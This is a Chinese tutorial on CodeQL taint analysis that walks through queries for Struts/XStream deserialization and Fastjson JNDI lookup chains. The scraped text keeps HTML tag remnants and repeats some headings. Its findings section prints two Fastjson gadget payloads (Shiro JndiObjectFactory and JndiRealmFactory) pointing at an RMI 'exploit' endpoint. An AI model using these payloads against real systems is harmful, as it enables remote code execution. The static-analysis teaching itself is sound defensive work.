CodeQL 污点分析实战教程<\/h1>

1. CodeQL 基础概念<\/h2>

1.1 污点分析简介<\/h3>
污点分析是一种追踪用户可控输入(Source)到敏感操作(Sink)的数据流技术，用于发现潜在的安全漏洞。<\/p>

1.2 关键术语<\/h3>

Source<\/strong>: 用户可控的输入点<\/li>
Sink<\/strong>: 可能产生危险的操作点<\/li>

Taint Tracking<\/strong>: 污点追踪，分析数据从Source到Sink的传播路径<\/li> <\/ul>
2. CodeQL 查询基础<\/h2>
2.1 方法查询<\/h3>
2.1.1 根据方法名查询<\/h4>
import java from Method method where method.hasName("toObject") select method <\/code><\/pre> 2.1.2 根据类名和方法名查询<\/h4> import java from Method method where method.hasName("fromXML") and method.getDeclaringType().hasQualifiedName("com.thoughtworks.xstream", "XStream") select method <\/code><\/pre> 2.1.3 根据接口名和方法名查询<\/h4> import java from Method method where method.hasName("toObject") and method.getDeclaringType().getAnAncestor().hasQualifiedName( "org.apache.struts2.rest.handler", "ContentTypeHandler") select method <\/code><\/pre> 2.2 方法调用查询<\/h3> 2.2.1 基本方法调用查询<\/h4> import java from MethodAccess call, Method method where method.hasName("toObject") and method.getDeclaringType().getAnAncestor().hasQualifiedName( "org.apache.struts2.rest.handler", "ContentTypeHandler") and call.getMethod() = method select call <\/code><\/pre> 2.2.2 获取方法调用的参数<\/h4> import java from MethodAccess call, Method method where method.hasName("toObject") and method.getDeclaringType().getAnAncestor().hasQualifiedName( "org.apache.struts2.rest.handler", "ContentTypeHandler") and call.getMethod() = method select call.getArgument(0) <\/code><\/pre> 3. 污点分析实战<\/h2> 3.1 基本污点分析框架<\/h3> import java import semmle.code.java.dataflow.DataFlow class MyConfig extends DataFlow::Configuration { MyConfig() { this = "Myconfig" } override predicate isSource(DataFlow::Node source) { \/\/ 定义Source } override predicate isSink(DataFlow::Node sink) { \/\/ 定义Sink } } <\/code><\/pre> 3.2 Struts 反序列化漏洞分析<\/h3> import java import semmle.code.java.dataflow.DataFlow class StrutsUnsafeDeserializationConfig extends DataFlow::Configuration { StrutsUnsafeDeserializationConfig() { this = "StrutsUnsafeDeserializationConfig" } override predicate isSource(DataFlow::Node source) { exists(Method method | method.hasName("toObject") and method.getDeclaringType().getAnAncestor().hasQualifiedName( "org.apache.struts2.rest.handler", "ContentTypeHandler") and source.asParameter() = method.getParameter(0) ) } override predicate isSink(DataFlow::Node sink) { exists(MethodAccess call, Method method | method.hasName("fromXML") and method.getDeclaringType().hasQualifiedName("com.thoughtworks.xstream", "XStream") and call.getMethod() = method and sink.asExpr() = call.getArgument(0) ) } } from StrutsUnsafeDeserializationConfig config, DataFlow::Node source, DataFlow::Node sink where config.hasFlow(source, sink) select source, sink <\/code><\/pre> 3.3 Fastjson JNDI 反序列化链分析<\/h3> 3.3.1 定义JNDI方法<\/h4> class JNDIMethod extends Method{ JNDIMethod(){ this.getDeclaringType().getAnAncestor().hasQualifiedName("javax.naming", "Context") and this.hasName("lookup") } } <\/code><\/pre> 3.3.2 完整污点分析查询<\/h4> \/** @kind path-problem *\/ import java import semmle.code.java.dataflow.FlowSources import semmle.code.java.dataflow.TaintTracking2 import DataFlow2::PathGraph class JNDIMethod extends Method{ JNDIMethod(){ this.getDeclaringType().getAnAncestor().hasQualifiedName("javax.naming", "Context") and this.hasName("lookup") } } class MyTaintTrackingConfiguration extends TaintTracking2::Configuration { MyTaintTrackingConfiguration() { this = "MyTaintTrackingConfiguration" } override predicate isSource(DataFlow::Node source) { exists(FieldAccess fac | (fac.getSite().getName().indexOf("get")=0 or fac.getSite().getName().indexOf("set")=0) and source.asExpr() = fac ) } override predicate isSink(DataFlow::Node sink) { exists(MethodAccess call | call.getMethod() instanceof JNDIMethod and sink.asExpr() = call.getArgument(0) ) } } from MyTaintTrackingConfiguration config, DataFlow2::PathNode source, DataFlow2::PathNode sink where config.hasFlowPath(source, sink) select source.getNode(), source, sink, sink.getNode() <\/code><\/pre> 3.3.3 发现的漏洞链<\/h4> org.apache.shiro.jndi.JndiObjectFactory<\/strong><\/p> String input =<\/span> "{\"@type\":\"org.apache.shiro.jndi.JndiObjectFactory\", \"resourceName\":\"rmi:\/\/127.0.0.1:9050\/exploit\"}"<\/span>;<\/span> <\/span><\/span>Object obj =<\/span> JSON.<\/span>parseObject<\/span>(<\/span>input);<\/span> <\/span><\/span><\/code><\/pre><\/li> org.apache.shiro.realm.jndi.JndiRealmFactory<\/strong><\/p> String input =<\/span> "{\"@type\":\"org.apache.shiro.realm.jndi.JndiRealmFactory\", \"jndiNames\":\"rmi:\/\/127.0.0.1:9050\/exploit\"}"<\/span>;<\/span> <\/span><\/span>Object obj =<\/span> JSON.<\/span>parseObject<\/span>(<\/span>input);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4. 高级技巧<\/h2> 4.1 减少误报<\/h3> 通过限制Source必须来自getter\/setter方法：<\/p> override predicate isSource(DataFlow::Node source) { exists(FieldAccess fac | (fac.getSite().getName().indexOf("get")=0 or fac.getSite().getName().indexOf("set")=0) and source.asExpr() = fac ) } <\/code><\/pre> 4.2 路径查询<\/h3> 在VS Code中查看数据流路径：<\/p> 右键点击查询窗口选择"CodeQL: Run Query"<\/li> 在Results视图中展开结果查看数据流步骤<\/li> 点击每个步骤查看源代码<\/li> <\/ol> 5. 参考资源<\/h2> CodeQL Workshop<\/a><\/li> CodeQL Java API 手册<\/a><\/li> QL 语法手册<\/a><\/li> Fastjson JNDI反序列化分析<\/a><\/li> CodeQL GitHub仓库<\/a><\/li> <\/ol>

CodeQL 污点分析实战教程<\/h1>

1. CodeQL 基础概念<\/h2>

1.1 污点分析简介<\/h3> 污点分析是一种追踪用户可控输入(Source)到敏感操作(Sink)的数据流技术，用于发现潜在的安全漏洞。<\/p>

2. CodeQL 查询基础<\/h2>

2.1 方法查询<\/h3>

2.2 方法调用查询<\/h3>

3. 污点分析实战<\/h2>

3.3 Fastjson JNDI 反序列化链分析<\/h3>

4. 高级技巧<\/h2>

5. 参考资源<\/h2> CodeQL Workshop<\/a><\/li> CodeQL Java API 手册<\/a><\/li> QL 语法手册<\/a><\/li> Fastjson JNDI反序列化分析<\/a><\/li> CodeQL GitHub仓库<\/a><\/li> <\/ol>

1.1 污点分析简介<\/h3>
污点分析是一种追踪用户可控输入(Source)到敏感操作(Sink)的数据流技术，用于发现潜在的安全漏洞。<\/p>

5. 参考资源<\/h2>

CodeQL Workshop<\/a><\/li>
CodeQL Java API 手册<\/a><\/li>
QL 语法手册<\/a><\/li>
Fastjson JNDI反序列化分析<\/a><\/li>
CodeQL GitHub仓库<\/a><\/li> <\/ol>